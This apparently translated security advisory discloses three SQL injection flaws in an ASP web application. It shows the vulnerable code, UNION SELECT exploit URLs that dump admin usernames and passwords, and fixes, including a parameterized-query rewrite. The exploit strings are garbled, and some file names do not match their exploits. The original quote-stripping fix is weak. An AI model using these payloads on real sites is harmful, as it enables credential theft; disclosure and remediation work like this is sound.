Official address: http://www.softatm.com
Proof of vulnerability: /css/ss.txt
Program download: http://down.chinaz.com/soft/33484.htm

Vulnerability file: /userinfo.asp, lines 72 to 74
Vulnerability type: injection
Vulnerable code:

    <%
    yhm = request("yhm")
    set rs = server.createobject("adodb.recordset")
    exec = "select * from yrwl_tb_admin where yhm = '" + yhm + "'"

Cause: the yhm parameter is concatenated into the SQL statement without any filtering, and the query is executed directly.
Hazard: SQL injection; the administrator account name and password are disclosed directly.
Exp: /userinfo. asp? Yhm = '% 20 union % 20 select % ,,2, 3, yhm % 2 bchr (35) % 2 bpass, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15% 20 from % 20yrwl_tb_admin

Vulnerability file: /userinfo.asp, lines 2 to 7
Vulnerability type: injection
Vulnerable code:

    mc = request("ad")
    if mc <> "" then
    set rs = server.createobject("adodb.recordset")
    ' locate
    SQL = "select * from yrwl_ad_dhl where cl = '1' and mc = '" + mc & "'"

Cause: the ad parameter is concatenated into the SQL statement without any filtering, and the query is executed directly.
Hazard: SQL injection; the administrator account name and password are disclosed directly.
Exp: /ad. asp? Ad = '% 20 union % 20 select %, 2, 3, 4, 5, 6, 7, 8, yhm % 2 bchr (35) % 2 bpass % 20 from % 20yrwl_tb_admin

Vulnerability file: /userinfo.asp, lines 32 and 52
Vulnerability type: integer injection
Vulnerable code:

    id = request("id")
    ...
    Exec = "select * from yrwl_tb_lt where id =" + id

Cause: the id parameter is concatenated into the SQL statement without any type check or filtering, and the query is executed directly.
Hazard: SQL injection; the administrator account name and password are disclosed directly.
Exp: /bbs_bj.asp? Id = 11% 20and % 201 = 2% 20 union % 20 select % 201, yhm % 2 bchr (35) % 2 bpass, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,16, 17,18, 19% 20 from % 20yrwl_tb_admin

Solution:
For integer parameters, convert the input with CInt() before using it.
For string parameters, filter out spaces and single quotes:

    replace(str, "'", "")
    replace(str, "%20", "")
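As an added example (not code from the advisory or from the vendor's product), the three lookups above rewritten in Classic ASP/VBScript. It keeps the advisory's integer check but, instead of the character-replacement filter, binds every user-supplied value through an ADODB.Command parameter so the value never becomes part of the SQL text; that is a stronger fix than replace() because the database driver, not string filtering, separates data from the statement. "conn" is assumed to be an ADODB.Connection already opened elsewhere in the application, and the column width of 50 for yhm is an assumption.

```vbscript
<%
Option Explicit
' Added example (not from the advisory or the vendor's code): the lookups
' from userinfo.asp / ad.asp / bbs_bj.asp done with a fixed SQL text and
' bound parameters. "conn" is an assumed, already-open ADODB.Connection.

Const adCmdText    = 1
Const adInteger    = 3
Const adVarChar    = 200
Const adParamInput = 1

' True only when s is a non-empty string made of ASCII digits. Used instead
' of IsNumeric(), which also accepts forms like "&H1F" or "1e3".
Function IsDigits(s)
    Dim i
    IsDigits = (Len(s) > 0)
    For i = 1 To Len(s)
        If Mid(s, i, 1) < "0" Or Mid(s, i, 1) > "9" Then IsDigits = False
    Next
End Function

' Integer parameter (the id case): reject anything that is not a whole
' number, then convert. CLng is the 32-bit counterpart of the advisory's
' CInt(); the 9-digit cap keeps the conversion from overflowing.
Function ReadIntParam(name)
    Dim raw
    raw = Trim(Request(name))
    If Not IsDigits(raw) Or Len(raw) > 9 Then
        Response.Status = "400 Bad Request"
        Response.Write "invalid " & Server.HTMLEncode(name)
        Response.End
    End If
    ReadIntParam = CLng(raw)
End Function

' Runs "select * from <table> where <column> = ?" with the value bound as a
' parameter. table and column come only from the calling code, never from
' the request. Quotes, spaces or a trailing UNION in value are plain data.
Function LookupByParam(table, column, adType, size, value)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select * from " & table & " where " & column & " = ?"
    cmd.Parameters.Append cmd.CreateParameter("p0", adType, adParamInput, size, value)
    Set LookupByParam = cmd.Execute
End Function

Dim rs, yhm, mc

' Replaces: Exec = "select * from yrwl_tb_lt where id =" + id
Set rs = LookupByParam("yrwl_tb_lt", "id", adInteger, 0, ReadIntParam("id"))

' Replaces: exec = "select * from yrwl_tb_admin where yhm = '" + yhm + "'"
' Truncating to the assumed column width of 50 is a cheap second check.
yhm = Left(Trim(Request("yhm")), 50)
Set rs = LookupByParam("yrwl_tb_admin", "yhm", adVarChar, 50, yhm)

' Replaces: SQL = "select * from yrwl_ad_dhl where cl = '1' and mc = '" + mc & "'"
mc = Left(Trim(Request("ad")), 50)
If mc <> "" Then
    Set rs = LookupByParam("yrwl_ad_dhl", "mc", adVarChar, 50, mc)
End If
%>
```

The cl = '1' condition from ad.asp is a constant and can simply stay in the CommandText; only request-derived values need to go through CreateParameter. A quick way to confirm the fix on a test copy is to request each page with a single quote or a space in the parameter and check that the page returns a normal empty result rather than an ADODB error or rows from yrwl_tb_admin.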